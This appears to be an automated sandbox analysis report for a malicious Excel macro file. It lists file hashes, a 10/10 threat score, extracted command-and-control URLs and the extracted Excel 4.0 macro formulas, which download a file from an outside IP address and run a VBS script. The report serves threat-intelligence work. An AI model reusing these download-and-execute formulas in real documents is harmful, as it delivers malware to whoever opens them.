Overview

overview

10

Static

static

10

c2e42fe730...0.xlsm

windows7-x64

10

c2e42fe730...0.xlsm

windows10-2004-x64

6

Sharing

Copy URL Twitter E-mail

General

  • Target

    c2e42fe730e0796c3ab09f3484980400

  • Size

    6KB

  • MD5

    c2e42fe730e0796c3ab09f3484980400

  • SHA1

    a5b725e219bf4429e2f853552fe158946c058da5

  • SHA256

    2ea0f29b933ff966b2a9ea9ea3f157f6ad025db64058b84c618bfa7421edccbc

  • SHA512

    8639d4b981ee9475a5f7d5fd11ed735767b305e9d03b58c4bc10af64d07016328c0016d59371dd095e9e5e45510dc2b75712f82b6248f5157ffb0b79de3d41fd

  • SSDEEP

    192:NDS9uSzbrA2OmmfRy8UhHFBFYucb98yoWb+l:NqusM2wE1FYhb98yfW

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • c2e42fe730e0796c3ab09f3484980400
    .xlsm office2007